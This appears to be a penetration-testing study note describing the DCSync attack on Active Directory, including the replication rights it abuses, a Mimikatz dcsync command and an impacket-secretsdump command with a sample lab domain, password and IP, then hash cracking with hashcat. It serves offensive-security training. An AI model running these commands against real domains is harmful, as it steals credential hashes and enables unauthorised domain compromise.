6. DCSync Attack

• Domain controllers typically rely on more than one DC for redundancy.
• Directory Replication Service (DRS) Remote Protocol uses "replication" to synchronize.
• A domain controller may request an update for a specific object using the "IDL_DRSGetNCChanges" API.
• Issuing an object update request from a user with certain privileges will work even though its not coming from a DC.
• To launch a replication the user needs rights to:
  • Replicating Directory Changes
  • Replicating Directory Changes All
  • Replicating Directory Changes in Filtered Set
• Normally, Domain Admins, Enterprise Admins, and Administrator groups have these rights, which will let them perform a "dcsync attack" to request any user hashes.

Local DCSync Attack with Mimikatz:

1. Start Mimikatz.
2. Perform dump:

lsadump::dcsync /user:corp\Administrator

3. Crack NTLM with hashcat.

Remote DCSync Attack with Impacket:

1. Run attack from Kali:

impacket-secretsdump -just-dc-user <targetuser> <domain/user-to-authenticate>:"<password-with-escaped-chars>"@<auth-user-ip>

Example:

impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.72